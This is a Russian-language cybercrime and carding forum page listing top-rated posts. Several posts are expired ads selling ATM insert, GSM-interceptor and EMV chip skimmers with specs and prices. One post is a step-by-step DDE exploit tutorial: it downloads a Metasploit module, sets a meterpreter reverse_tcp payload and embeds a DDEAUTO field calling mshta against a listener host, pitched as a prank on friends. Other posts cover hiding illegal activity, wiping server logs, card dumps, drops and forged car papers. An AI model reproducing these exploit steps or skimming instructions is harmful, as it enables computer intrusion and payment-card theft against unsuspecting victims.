Перейти к публикации

Таблица лидеров


Популярные публикации

Отображаются публикации с наибольшей репутацией на 16.09.2022 во всех областях

  1. 7 баллов

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Ncr, Wincor Nixdor, Diebold Insert Skimmer.Полный комплект готов к работе. Батарея может работать до 48 часов,наружная температура не влияет на время работы скиммера, так как скиммер находится внутри банкомата.Храните до 15000 дорожек кредитных карт. Полный комплект включает в себя инструменты для вставки и удаления, кабель для передачи данных,компакт-диск с программным обеспечением, это продукт plug and play, который готов к работе. Доступен для заказа PIN-пад в качестве дополнительной опции.

    1,000.00 USD

  2. 6 баллов

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    ДОСТУПНА НОВАЯ ВЕРСИЯ – НОВЫЙ ИНТЕРФЕЙС, ПОВЫШЕННАЯ АНТЕННА, МОДЕЛЬ V22.3.4 LTE2017-модель 2018 года. Скимминг банкоматов без какого-либо физического контакта. Этот скиммер будет работать без физического подключения к банкомату/POS-машине. Этот продукт является нашим бестселлером и является самым популярным устройством для скимминга кредитных карт во всем мире. Это GSM-перехватчик – скиммер. Он получает данные кредитных карт из банкоматов и POS-терминалов. Небольшой размер 5×4 сантиметра, длина антенны 17 сантиметров. С одной зарядкой он может работать до 8 часов, а изготовленная память может захватывать около 100000 данных кредитных карт, с антенной он может принимать данные в радиусе 50 метров. Устройство может работать от (-25 до +45 градусов). Мы используем батареи 3,7 В 2500 мАч. При одной зарядке устройство может работать до 8-10 часов. Он имеет встроенную память 32 Гб, он может хранить до 100000 данных кредитной карты с pin-кодами. Кратко – Приемник данных GSM-это приемник GSM-модуля, который с помощью специального программного обеспечения клонирует и получает всю информацию о кредитных картах из банкоматов и POS-терминалов. Полученная информация хранится на вашем телефоне или ноутбуке. Чтобы собрать эту информацию, вам просто нужно подключить устройство к компьютеру или мобильному устройству, и устройство отправит данные на ваш компьютер, с помощью программного обеспечения V22.3.4. GSM-приемник также реализовал новую функцию, возможность добавления банка питания для увеличения срока службы скимминга. GSM – приемник данных небольшой, и вы можете легко спрятать его в сумке, одежде, кармане или в автомобиле-рядом с терминалом POS/ATM. Устройство имеет два светодиода – красный и зеленый Красный – Устройство должно заряжаться. Мигающий красный – Устройство может работать еще 30-40 минут, после чего его необходимо зарядить или добавить блок питания или зарядное устройство usb. Зеленый+Красный – Устройство работает. Мигает зеленым – устройство подключается. Цена за GSM перехватчика $1200 USD с доставкой включена. Цена GSM перехватчика + энкодер MSR и 100 пустых пустых карт $1415USD с доставкой включена.

    1,200.00 USD

  3. 5 баллов

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    СКИММЕР-ЭТО УСТРОЙСТВО, КОТОРОЕ ПОМЕЩАЕТСЯ ВНУТРИ БАНКОМАТА ИЛИ POS. СКИММЕР EMV ПЕРЕХВАТЫВАЕТ СООБЩЕНИЯ МЕЖДУ ЧИПОВОЙ КАРТОЙ И СЧИТЫВАТЕЛЕМ ЧИПОВЫХ КАРТ ИЗ БАНКОМАТА ИЛИ POS. СКИММЕР EMV ЗАПИШЕТ ИНФОРМАЦИЮ О КРЕДИТНОЙ КАРТЕ, ТАКИМ ОБРАЗОМ, ИНФОРМАЦИЯ О КРЕДИТНОЙ КАРТЕ БУДЕТ УКРАДЕНА. СКИММЕР EMV-ЭТО УСТРОЙСТВО, КОТОРОЕ ПОМЕЩАЕТСЯ ВНУТРИ БАНКОМАТА ИЛИ POS ДЛЯ ПЕРЕХВАТА СВЯЗИ МЕЖДУ ЧИПОВОЙ КАРТОЙ И СЧИТЫВАТЕЛЕМ ЧИПОВЫХ КАРТ ИЗ БАНКОМАТА ИЛИ POS И ЗАПИСИ ИНФОРМАЦИИ О КРЕДИТНОЙ КАРТЕ, ТАКИМ ОБРАЗОМ, ИНФОРМАЦИЯ О КРЕДИТНОЙ КАРТЕ БУДЕТ УКРАДЕНА. Скиммер Emv-это устройство, которое помещается внутри банкомата или POS для перехвата сообщений и записи кредитной карты между чиповой картой и считывателем чипов из банкомата или POS, таким образом, вся информация о кредитной карте похищается. У вас будет быстрый и простой трек 1, трек 2 и PIN-код со всех кредитных карт, которые используют эти банкоматы или POS. Вы можете загрузить информацию с скиммера Emv, подключив телефон или ноутбук по Bluetooth к скиммеру Emv. Такое устройство СКИММЕРА EMV может не только считывать данные владельца карты с чипа, но и перехватывать PIN-код. УСТРОЙСТВО СКИММЕРА EMV создает копию исходной карты, включая все стандартные проверки подлинности SDA-Статическая проверка подлинности данных, DDA - Динамическая проверка подлинности данных, CDA-Комбинированная проверка подлинности данных. С помощью нашего устройства EMV Скиммер вы можете очень легко получить всю информацию о кредитной карте из любого банкомата или POS. С помощью устройства СКИММЕРА EMV вы можете получить трек 1 + 2 + Pin.

    1,600.00 USD

  4. 2 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Изготовим скиммеры под любой банкомат и любые цели. Возможно решение с передачей данных по GSM, bluetooth, internet. Обращайтесь всегда проконсультируем

    1,500.00 USD

  5. 1 балл
  6. 1 балл
    Транш на 5000$ прошел успешно , дерзайте , только не забывайте про гаранта
  7. 1 балл
    Теория DDE exploit используется для динамического обмена данных. Эта уязвимость позволяет передавать данные между приложениями MS Office без взаимодействия между пользователями. Этот метод используется для получения доступа к системе. Можно легко отправить файл другу с данными его "переписки" и он с большим любопытством будет открывать этот файл) Установка Необходимые составляющие для проведения атаки: Устройство с Kali Linux. Устройство с Windows. Microsoft Office (Word). Все описанные действия проводились в Kali Linux. Для начала нам необходимо установить компоненты и добавить их в базу Metasploit. Сначала скачаем эксплоит с помощью команды: wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Далее добавим эту утилиту в папку с эксплоитами Metasploit: mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ После этого можно переходить в msfconsole. Запускаем и производим обновления всех наших путей: msfconsole reload_all После этого можно переходить к генерации нашей полезной нагрузки. Для этого необходимо пошагово выполнять такие команды: use exploit/windows/dde_delivery Далее нам необходимо установить свой сервис чтобы принимать соединение, для этого нужно указать команду со своим IP адресом: set SRVHOST 192.168.177.141 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.177.141 set LPORT 6708 exploit exploit Подготавливаем документ MS Office После этого получаем ссылку, которую нужно вмонтировать в документ MS Office. Для этого переходим в раздел "Вставить"->"Быстрые элементы"->"Поле" (Можно использовать быструю комбинацию CTRL + F9). {DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.1.6:8080/wi9o8uanVgkjv”} После открытия документа откроется сессия. После открытия будут два всплывающих окна. Но они без каких либо запретов, просто уведомления о наличии сторонних связей с другими приложениями. Готовая ссылка Получаем сессию Заключение Вот таким способом можно получить доступ к компьютеру. Дальше смотрите в сторону пост эксплуатации. Там есть очень много чего интересного. Любите своих друзей и не заставляйте их скучать. Можно пошутить вот таким простым, но эффективным способом. Также формулы можно использовать и в других программах MS Office. Для более правдоподобного вида нужно наполнять документы тематическим содержанием.
  8. 1 балл
    Если ещё актуально готов связаться поговорить
  9. 1 балл
  10. 1 балл
    Даже по "тупым" схемам, прейдется платить как минимум дропам и по личному опыту знаю, что берут около десятки за 1 ИП
  11. 1 балл
    Что то с телеграм у меня случилось, давай в ЛС спрашивай
  12. 1 балл
    Да, анонимность в наше время очень редкая и важная штука ...
  13. 1 балл
    Открываю, человек действительно может все, о чем говорит, единственное , не смогли найти дропа для удаления судимости Администрация форума настоятельно рекомендует проводить все сделки через гарант-сервис!
  14. 1 балл
    Оформил мне доки на спизженную машину Это фиаско братан
  15. 1 балл
    Забавно, осталось только 150к где то добыть
  16. 1 балл
  17. 1 балл
    Готов купить, ответь в жаббе
  18. 1 балл
  19. 1 балл
    Фуф, спасибо! Ожидаю посылки теперь ))
  20. 1 балл
    Может быть я и повторюсь в чем то, но не судите строго, первая статья Хотелось бы получить VIP Статус! но про безопасность можно говорить всегда) Как говорится:" повторение мать ученья"! Введение: зачем это нужно? Компьютеризация населения сделала заметный вклад в повседневную деятельность среднестатистического человека. Для кого-то информационные технологии стали средством получения стабильного дохода, зачастую не совсем законного, а для кого-то и совсем незаконного (простите за каламбур). Цель данного материала состоит не в описании каких-то сложных схем сокрытия факта своей деятельности от налоговой инспекции и не в предоставлении инструкции по исключению встречи с правоохранительными органами. Если читателю есть что скрывать, данный обзор подскажет как лучше организовать процесс сокрытия, в зависимости от ситуации. Схемы, представленные в обзоре, представляют собой некую базу, на основе которой можно строить свои методики. 1. Конфиденциальность при работе с операционной системой. Небольшое отступление: идея написать данный материал возникла из небольшого поста в моем блоге ("Анализ конфиденциальности при работе с гостевой ОС"), поэтому начну с рассмотрения излюбленной многими концепции «виртуальной машины». 1.1 Использование виртуальных машин. Иллюзия изолированности гостевой ОС разрушается при рассмотрении некоторых процессов, протекающих в основной ОС. В клиентских линейках многих операционных систем присутствует режим гибернации. При переходе в данный режим содержимое оперативной памяти отображается на жесткий диск и при стандартных настройках системы остается до следующего перехода. Риск сохранения состояния гостевой ОС на жестком диске довольно высок и не стоит списывать его со счетов. Для ускорения работы ОС существует механизм постраничного сохранения участков оперативной памяти, которые не используются довольно продолжительное время (swap). Далее, при обращении к такому участку он восстанавливается в оперативную память. Соль этого механизма в том, что все эти манипуляции производятся прозрачно для пользователя и последний никак не может повлиять на процесс копирования. Изменение размера файла подкачки снижает, но не устраняет риск попадания данных о состоянии сеанса гостевой ОС на жесткий диск из оперативной памяти. В свою очередь, полное отключение свопа устраняет потенциальный источник «утечки», но снижает скорость работы системы в целом. Тут придется идти на компромисс. + удобность в повседневном использовании + быстрое удаление компрометирующих данных в случае надобности + наличие образов и, как следствие, возможность сокрытия образа компрометирующей гостевой ОС + быстрая развертываемость инфраструктуры - наличие неявных каналов утечки данных из гостевой ОС в основную ОС - снижение производительности (весомый недостаток для многих) - отсутствие автономности образов гостевых ОС от используемого для виртуализации ПО 1.2 Конфиденциальность при работе с LiveCD(DVD/USB)-дистрибутивами. Широко распространена практика использования мобильных носителей с предустановленными системами. Кто-то предпочитает одну единственную систему, предназначенную для установки на flash или CD и содержащую весь необходимый инструментарий для работы в «полевых» условиях, а кто-то отдает предпочтение своей собственной сборке, настраивая все под свои нужды. При работе с данным типом операционных систем наиболее высоким показателем качества, пожалуй, является «быстроразвертываемость» (мобильность). Лучший инструмента для анонимной работы в незнакомых условиях трудно найти, чего не скажешь о повседневном использовании: отсутствие возможности сохранения данных, конфигурационных файлов и т.п. является как отрицательным фактом (в ущерб usability), так и положительным (отсутствие утечки данных в основную память рабочей станции). Манипуляция данными исключительно в оперативной памяти позволяет не беспокоиться о явных каналах утечки данных. + мобильность + возможность работы в «полевых» условиях + работа с данными исключительно в оперативной памяти - неудобство повседневного использования. 1.3 Конфиденциальность при работе с удаленными рабочими станциями (выделенными серверами). Неаккуратное использование удаленных рабочих станций для совершения незаконных действий может раскрыть нарушителя, продемонстрировав его IP-адрес или другую полезную информацию третьим лицам. Рассмотрим возможные каналы утечки данных на примере Windows-серверов, в силу их наибольшей распространенности, которая, в свою очередь, вытекает из большей степени уязвимости. При использовании службы терминалов (она же RDP) и при недостаточных «предосторожностях» есть риск попадания авторизованных действий в системные журналы (в Win NT так называемый event log: C:\WINDOWS\system32\config, все файлы которого скрытые и подлежат удалению с помощью специального ПО, наподобие Unlocker). Если установленные взломщиком программы создают сетевую активность или активно используют ресурсы сервера, бдительный администратор может заметить подозрительную сетевую активность (либо подозрительную новую службу). Есть риск попасть «под колпак», т. е. администратор имеет все возможности снифать порт, на котором висит ПО нарушителя. Отсюда, как результат, утечка конфиденциальной информации. К тому же никто не даст гарантии, что взломанный сервер не входит в сеть honeypot со всеми вытекающими… + выделенные сервера доступны 24/7 + производительность - при недостаточных мероприятиях существует возможность попасть под наблюдение администраторов сервера, со всеми вытекающими последствиями. 2. Анонимность при работе с web-ресурсами. «Независимые исследователи» защищенности web-приложений в своей работе зачастую используют цепочки прокси-серверов и/или анонимную сеть Tor (или ее аналоги, например, I2P). Рассмотрим подробнее каждую из этих схем. 2.1 Использование прокси-серверов. Техническая особенность цепочки прокси-серверов: отображение в логах целевого сайта последнего сервера в цепочке и прозрачный обмен данными между взломщиком и целевым сайтом. Однако как первый, так и второй факт можно оспорить: существует множество методов раскрытия нарушителя, который прячется за прокси-сервером, а также резкое снижение скорости соединения в силу технических особенностей. Думаю, заострять внимание на подобной схеме не имеет смысла, так как на форуме данная тема «истерта» до мелочей. Перейдем к более интересной схеме - анонимной сети Tor. 2.2 Использование анонимной сети Tor. (дан как пример) Распределенная система серверов (нодов), между которыми трафик проходит в зашифрованном виде, знакома любому, кто хоть немного задумывался над собственной анонимностью в Сети. На последней ноде в цепочке (так называемой, exit-ноде) передаваемые данные проходят процедуру расшифровки и передаются целевому серверу в открытом виде. Данный факт позволяет поставить снифер на выходной ноде и просматривать весь проходящий трафик. Звучит просто, но на самом деле все именно так. Подробнее процедура перехвата трафика в сети Tor описана в октябрьском номере журнала «Хакер» (статья «Включаем Tor на всю катушку»). + прохождение трафика в зашифрованном виде по цепочке серверов +постоянная смена цепочки (изменение маршрута следования пакетов) +возможность создания ноды - передача данных с exit-node целевому серверу в открытом виде и, как следствие, возможность перехвата пакетов. 3. … Технологию VPN я нарочно оставил за кадром, ведь обилие ее реализаций и способы использования сильно разнятся, что не позволит охватить все схемы в данном обзоре. Каждый предпочитает свою схему обеспечения конфиденциальности при работе в различных сферах ИТ и поэтому давать универсальные рекомендации я не берусь, а хочу лишь попросить читателей не стесняться и выкладывать описания своих схем для последующего детального анализа и выявления «узких» мест, которые я (и другие участники форума) с удовольствием прокомментируют в данном посте.
  21. 1 балл
    Спасибо большое за инфу. интересно знать) бро можно поинтересоваться? я ничего не отключал. сидя через впн перешел по твоей ссылке.он показал ip впн. ровно?
  22. 1 балл
    Отличная статья.Ставлю +!
  23. 1 балл
    Чиновники считают, что кибератака была организована специалистами из Китая. Хакеры в очередной раз совершили кибератаку на сервер одного из федеральных ведомств США и получили доступ к персональным данным сотрудников американской разведки и военных, которые те предоставили для получения доступа к секретной информации. Кроме личных данных в руки хакеров попали также списки контактов родственников военных, что, по мнению чиновников, может быть использовано для давления на них. По данным СМИ, всего в руки хакеров попали данные более чем 14 миллионов человек. Американские чиновники заявили, что кибератака была проведена с территории КНР. Напомним, ранее хакерам удалось получить доступ к персональным данным бывших и действующих чиновников федеральных ведомств США. Тогда кибератаке подверглись базы данных управления по персоналу федерального правительства. Отметим, что в этой атаке чиновники также подозревают китайских специалистов. Однако власти КНР полностью отрицают это.
  24. 1 балл
    Похоже меня услышали) Спасибо тебе добрый человек!
  25. 1 балл
    Спасиибо) Аки вообще крутые) Да еще и с балансом!
  26. 1 балл
    Спасибо) Буду пробовать
  27. 1 балл
    прозвон со своего можно делать?или тоже левый номер нужен?
  28. 1 балл
    интересует, отписал вам в лс!
  29. 1 балл
  30. 1 балл
    Египетский хакер показали, что с помощью одного можно использовать, чтобы получить контроль над любой счет PayPal в связи с наличием ряда недостатков. Египетский исследователь безопасности, Ясир H. Али был сообщили три критических уязвимостей в веб-сайте PayPal, которые могут быть использованы злоумышленником на компромисс аккаунт пользователей. Уязвимости включают CSRF и обход аутентификации маркера и Сброс вопрос безопасности flaw.It не первый раз, когда Ясир обнаруживает подобные ошибки счета пользователей нашла на сайте eBay целого ряда факторов уязвимости, что позволило ему захватить любую учетную запись eBay в всего в 1 минуте . Сайт PayPal влияет на CSRF (Cross-Site Request подлог) уязвимости, которая позволяет злоумышленнику перехватить пользователей счета, уязвимость потенциально ставит миллионы пользователей PayPal Счета в опасности. CSRF позволяет конечному пользователю выполнять нежелательные действия на Веб-приложение, как только он проходит проверку подлинности, после типичной схеме атаки, злоумышленник отправляет ссылку по электронной почте или через социальную медиа-платформы, или поделиться специально созданный HTML использовать страницу, чтобы обмануть жертву в выполнении действий по выбору атакующего. Ясир H. Али предоставил доказательство правильности концепции (ПСУ) видео, чтобы объяснить, как использовать брешь с помощью одного эксплойт, который преимущества трех уязвимостей. Как сообщили коллеги в THEHACKERNEWS Ясир эксплуатации CSRF использовать, чтобы связать новый вторичный электронный идентификатор для целевого счета PayPal и сброс ответы на вопросы безопасности со счета жертвы. Чтобы избежать обнаружения поддельного запроса, отправить по атакующим, выдающего себя за владельца счета законную PayPal реализует механизм аутентификации на основе токенов, но г-н Ясир успешно обошел его для создания кода эксплойта для целевых атак. PayPal-hacking.png " Я узнал, что CSRF Auth можно использовать повторно для этого конкретного адреса электронной почты пользователя или имя пользователя, это означает, что если злоумышленник нашел ни одного из этих CSRF токены, тогда он может совершать действия в себя вести любой вошедшего в систему пользователя. "Ясир объяснил Hacker News . При выполнении подвиг, Ясир H. Али будет добавить электронный идентификатор злоумышленника на счет жертвы, новое сообщение электронной почты может быть использован для сброса пароля учетной записи через "Забыл пароль "процедуры, осуществляемой PayPal.At эту точку злоумышленник имеет руку в счет жертвы, но вытеснить окончательно владельца счета законную он должен изменить пароль жертвы. Чтобы сделать это, злоумышленник должен ответить на вопросы безопасности, настроенные пользователем при регистрации, и это дополнительный препятствием на счет рубить. Тем не менее, Ясир обнаружил другую ошибку в PayPal, что позволяет злоумышленнику сбросить вопросы безопасности и ответы, выбранные владельца счета. Используя этот последний недостаток, Ясир обошел функции безопасности PayPal, чтобы сбросить новый пароль для account.Yasser жертвы сообщили о дефектоскопа PayPal, которая уже исправил это, недостаток было принято через Буг Bounty программы. Пьерлуиджи Паганини
  31. 1 балл
    Мужики ну кто что скажет по счет РБК)
  32. 1 балл
    в дажбее что не отвечаешь пишу пишу,а ты молчишь
  33. 1 балл
    Не секрет, что современые браузеры просто напичканы разным шпионсками фишками и Socks с VPN - это иллюзия анонимности. Минуя Socks и VPN можно: 1 Можно определить важе реальное местоположение через VPN несколькими способами 2 Даже через VPN по ID браузера Google и другие конторы знают, что вы - это вы и какие IP вы меняете и что делаете 3 Можно через браузер определить, что вы под виртуальной машиной, вроде VmWare 4 Через Socks или VPN можно узнать реальный IP адрес В статье я приведу простенькие примеры детектов 1) Тест на детект внутренник IP адресов WebRTC Зайдите на http://net.ipcalf.com фирефоксом или хромом, даже сквозь VPN или socks5 выдаст внутренние IP. Таким образом можно определить наличие виртуалкки Vmware и других. Интересный пример, что на USB модемах можно определить где вы находитесь (IP внутри натов распределены по районам). Что особенно интересно, можно еще и соседние хосты выяснить, посмотрите https://dl.dropboxusercontent.com/u/...enumhosts.html и статью на тему https://hacking.ventures/local-ip-di...-privacy-risk/ 2) Тест на определение геолокации. Новые возможности браузера Поставьте браузер Firefox, зайдите на http://www.browserleaks.com/geo Если в ноуте есть модули GPS, определится ваше местоположение в точности до 20 метров. Доверенные сайты, в том числе гугл и без разрешения узнают сквозь VPN и Сокс реальное местоположение. Проснифайте, например, Firefox, то и сливает на geo.mozilla.org совершенно без спроса, дальше по вашему идентификатору браузера можно вас вычислить 3) Етаг - надежная фишка для детекта вас Зайдите фирефоксом на http://javascript.ru/unsorted/Id#kesh-brauzera. Закройте браузер, зайдите снова, будет тот же код 4) Тест на специфичность браузера (фишек ИЕ нет в Фаерфокс, например) Попробуйте изменить хедеры под ИЕ в любом браузере (максимально закосите под IE) и зайдите на http://www.browserleaks.com/javascript. В разделе Internet Explorer Features будет писать No Internet Explorer found и никак это не обходится, хоть как меняй - всё равно определит , что не ИЕ 5) Профильные системы / фингерпринты по куче параметров браузера Можно определить что вы - это вы по хешу, который генерируется из ряда параметров браузера (шрифты, таймзона, хедеры, внутренности яваскрипт и многое другое). Зайдите фаерфоксом на https://panopticlick.eff.org/index.p...ion=log&js=yes Смысл в том, чтобы все bits of identifying information были меньше 20. Иначе вас можно идентифицировать. А это значит, хоть меняйте IP, хоть не меняйте, вас можно вычислить
  34. 1 балл
    спасибо большое)извините за наглость,подкиньте плиз маленько бинов)
  35. 1 балл
    Смени просто селера картона и все,походу он у тебя и вправду говно
  36. 1 балл
    После долгих затяжных работ,мы наконец полностью восстановились.Извиняемся за столь длительный период,почти целый год лежал форум.НУ что начнем новую жизнь)Желаю нашему проекту процветания,а вам дорогие пользователи огромного фарта и больших $$$). Удачи в нашем нелегком деле!)
  37. 1 балл
    Здравствуйте. Я первый раз на форуме. Хочу поинтересоваться у вас есть ли смысл и возможность купить енкодер, купить здесь же дампы, залить на карты и спокойно шопиться? Если да, мог бы кто-нибудь провести ликбез по данной тематике. Понимаю, вопрос адский, но давайте воздержимся от глумного флуда и бросания камней в новичков. Спасибо
  38. 1 балл
    АССАВ!!!Че молчишь?Ау????Ак в чужих т\емах срать-МОЛОДЕЦ!!!! (За оскорбление бан) !!!Закрой свой рот-ДЕЛЕЦ!!!!Или ты как Абромович!!!Че тада сидишь на форуме??? (За оскорбление бан) ?
  39. 1 балл
  40. 1 балл
    тоже интересует этот вопрос
  41. 1 балл
    тут только часть истины, и часть ложно (:
  42. 1 балл
    если логически подойти к вопросу - в любом месте где прокатывают карту... В барах, ресторанах, клубах, ну и магазах где оплачивают картой... Соответственно нужно что бы небыло камер, ну или если есть возможность - искать "мертвые зоны" от тех же самых камер (это в случае клубов итп).
  43. 1 балл
    Дамп не читает на сколько мне известно. Вообще дайте не много времени и я постараюсь выложить статью здесь об устройстве, что читает как читает и тд. На сегодняшний день знаю лишь что читается там карта (данные вида номер+имя), на счет цвв еще вопрос, на счет дампа тоже пока сомневаюсь.
  44. 1 балл
    Интересно написано и картинка в конце нравится, только надпись на ней не очень ))
  45. 1 балл
    интересует старый образец. Есть пару вопросов - адресовал в личку.
  46. 1 балл
    чужие деньги не хорошо считать. p.s.:деньги не пахнут,как и счета в банках.
  47. 1 балл
    Ага-ага статус повесите удалюсь с форума нах вашего
  48. 1 балл
    возбуждено-то будет, но х.. что докажут. Доказать мошенничество подобного рода практически не возможно, если только сам языком не разбалтает
  49. 1 балл
  50. 1 балл
    Характер возможной КРИМИНОГЕННОСТИ обусловлен, прежде всего способностью Тельца к постепенному и целеустремленному накапливанию агрессии, что влечет за собой хорошо спланированные, холодно, с ясным сознанием рассчитанные преступления. Именно эта способность к терпеливому ожиданию своего часа делает Тельцов-преступников наиболее опасными. Телец никогда не отступит от намеченного преступления и совершит его без аффекции, спокойно и уверенно, хорошо предусмотрев все возможные последствия и позаботившись о надежном укрытии улик. Телец не завистлив, не мучается комплексами, но то, что считает принадлежащим ему по объективному или им же установленному для себя праву, возьмет непременно. В Тельце сочетается стремление к накопительству и стремление к убедительной демонстрации своего материального статуса. Тельцы-убийцы действуют по изначально корыстным мотивам. Они не мстительны в общепринятом понимании, но, испытав какое-то ущемление своих интересов, выносят приговоры своим будущим жертвам. Телец-насильник лишен импульсивности. Он весьма редко избирает своими жертвами незнакомых и малознакомых женщин, нет, он заранее облюбовывает объект, вначале открыто заявляя о своих правах на него, а потом, получив отказ, берет силой то, что считает своим. В списках и убийц, и насильников, Тельцы занимают лидирующее второе место.
×
×
  • Создать...